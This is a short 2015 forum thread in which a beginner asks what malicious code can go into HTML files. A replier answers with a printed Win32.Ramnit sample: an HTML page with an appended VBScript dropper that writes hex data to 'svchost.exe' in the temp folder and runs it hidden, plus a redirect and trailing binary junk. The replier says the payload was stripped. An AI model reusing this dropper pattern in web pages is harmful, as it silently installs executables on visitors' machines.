Programming and Scripting => Beginner's Corner => : Zman0x0 October 13, 2015, 04:53:31 AM
Hey boys and girls i know HTML how to make websites and do other fun things with it, but the thing is there malcious code i can put into .htm files and or site?
You can try analysing the Win32.Ramnit malware.
It infects html files by appending malicious code at the end.
Here is an example from one sample which I analyzed. I have purposely removed the malicious payload which was in WriteData.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<html xmlns="http://www.w3.org/1999/xhtml">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.nosteam.ro">
<style type="text/css">
</html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--©ïnUGzVhYûÔ¼ÁVP®7nꌕgrŸ— s´
«ŒpQ*Eùqâmw‰1ûÅå•qJ-qý ŠM¯CA‡Þ HžcU°òØ[ZZ8Ò'›¤$¼ÐÏ#Z ¦nyûtM¼y_d°Ü!mxgÑ7+r@¬" š'äE¦¿8yimMëĶÁ$‰#ð^!ɱè$Œk»¾_Ç´'
&D!þ½ÖŽÈ·òü·ýMCŒ¯°£%N i݃ѳiëi”dá3Q‹Ùï¡›eñbGw•˜¯ÂpÕ[ú¤qƯb´•Îï¼´ì}çYÝ3*¨—ÑŠ³²\IÛPXlŠiñ €}Iú¼µOx5m!;ø‹
pLM[)öá‹Ù;; ñêR2ñûñêñêñêØ¢L¾ŠRQýê ñê-->